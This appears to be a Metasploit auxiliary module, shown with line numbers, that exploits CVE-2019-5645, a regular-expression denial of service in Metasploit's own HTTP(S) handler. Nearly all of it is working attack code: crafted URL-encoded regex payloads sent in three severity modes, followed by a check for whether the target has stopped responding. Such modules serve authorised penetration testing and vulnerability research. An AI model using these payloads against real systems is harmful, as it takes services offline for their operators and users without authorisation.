1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Metasploit HTTP(S) handler DoS',
15
        'Description' => %q{
16
          This module exploits the Metasploit HTTP(S) handler by sending
17
          a specially crafted HTTP request that gets added as a resource handler.
18
          Resources (which come from the external connections) are evaluated as RegEx
19
          in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.
20

21
          Tested against Metasploit 5.0.20.
22
        },
23
        'Author' => [
24
          'Jose Garduno, Dreamlab Technologies AG', # Vulnerability Discovery, Metasploit module.
25
          'Angelo Seiler, Dreamlab Technologies AG', # Additional research, debugging.
26
        ],
27
        'License' => MSF_LICENSE,
28
        'References' => [
29
          ['CVE', '2019-5645']
30
        ],
31
        'DisclosureDate' => '2019-09-04',
32
        'Notes' => {
33
          'Stability' => [CRASH_SERVICE_DOWN],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39

40
    register_options(
41
      [
42
        OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])
43
      ]
44
    )
45
  end
46

47
  def test_service_unresponsive
48
    print_status('Testing for service unresponsiveness.')
49

50
    res = send_request_cgi({
51
      'uri' => '/' + Rex::Text.rand_text_alpha(8),
52
      'method' => 'GET'
53
    })
54

55
    if res.nil?
56
      print_good('SUCCESS, Service not responding.')
57
    else
58
      print_error('Service responded with a valid HTTP Response; Attack failed.')
59
    end
60
  rescue ::Rex::ConnectionRefused
61
    print_error('An unknown error occurred.')
62
  rescue ::Timeout::Error
63
    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
64
  end
65

66
  def dos
67
    case datastore['DOSTYPE']
68
    when 'HARD'
69
      send_request_cgi(
70
        'method' => 'GET',
71
        'uri' => normalize_uri('/%2f%26%28%21%7c%23%2b%29%2b%40%32%30')
72
      )
73
      begin
74
        send_request_cgi(
75
          'method' => 'GET',
76
          'uri' => normalize_uri('/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21')
77
        )
78
      rescue ::Errno::EPIPE, ::Timeout::Error
79
        # Same exceptions the HttpClient mixin catches
80
      end
81
      test_service_unresponsive
82

83
    when 'SOFT'
84
      send_request_cgi(
85
        'method' => 'GET',
86
        'uri' => normalize_uri('/%5b20')
87
      )
88

89
      test_service_unresponsive
90

91
    when 'GENTLE'
92
      send_request_cgi(
93
        'method' => 'GET',
94
        'uri' => normalize_uri('/%2e%2a%7c%32%30%7c%5c')
95
      )
96

97
      sleep(1)
98

99
      send_request_cgi(
100
        'method' => 'GET',
101
        'uri' => normalize_uri('/whatever')
102
      )
103

104
      resthree = send_request_cgi(
105
        'method' => 'GET',
106
        'uri' => normalize_uri('/whatever2')
107
      )
108

109
      if resthree.body.empty?
110
        print_good('SUCCESS, Service not responding.')
111
      else
112
        print_error('Service responded with a valid HTTP Response; Attack failed.')
113
      end
114

115
    else
116
      fail_with Failure::BadConfig, 'Invalid DOSTYPE selected'
117
    end
118

119
    print_status('DOS request sent')
120
  end
121

122
  def is_alive?
123
    begin
124
      connect
125
    rescue Rex::ConnectionRefused
126
      return false
127
    ensure
128
      disconnect
129
    end
130
    true
131
  end
132

133
  def run
134
    print_status("#{rhost}:#{rport} - Sending DoS packet...")
135
    dos
136
  end
137

138
end
139

140